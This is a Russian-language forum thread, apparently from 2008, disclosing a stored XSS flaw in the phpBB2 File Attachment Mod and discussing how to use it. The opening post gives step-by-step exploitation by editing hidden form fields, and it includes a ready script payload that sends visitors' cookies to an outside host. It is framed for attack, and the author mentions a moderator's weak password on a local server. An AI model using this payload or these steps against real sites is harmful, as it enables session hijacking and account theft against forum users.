!!! phpBB2 mod File Attachment Mode новая активная XSS !!! Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5 привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 )))) исходя из сообщения Basurman : рассмотренная мной версия >= 2.0.22 уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже)) Уязвимые поля: attachment_list[] filename_list[] filesize_list[] filetime_list[] attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал) суть уязвимости: при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр type у указанных выше полей на text, и изменяем и изменяем action формы на полный путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере. видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie ) все тоже самое с перечисленными выше скриптами... на 3-й ветке пробовал там уже нету..... Video: http://www.youtube.com/watch?v=V3l9olLFLbw + если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ___________________________________
Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?
Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо.... ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код....
Это вопрос был И еще: В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом. Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5
Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать... а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник)))))
тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать)))) bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел....
А этот скрипт работает через сервера или через клиента, тоесть когда заходят на заражённую страницу, то инфа посылается через сервер где находится страница или через клиента, котрый зашёл на страницу???
на большинстве форумов нет опции приложения файлов. Это значит она отключена или просто не та версия форума?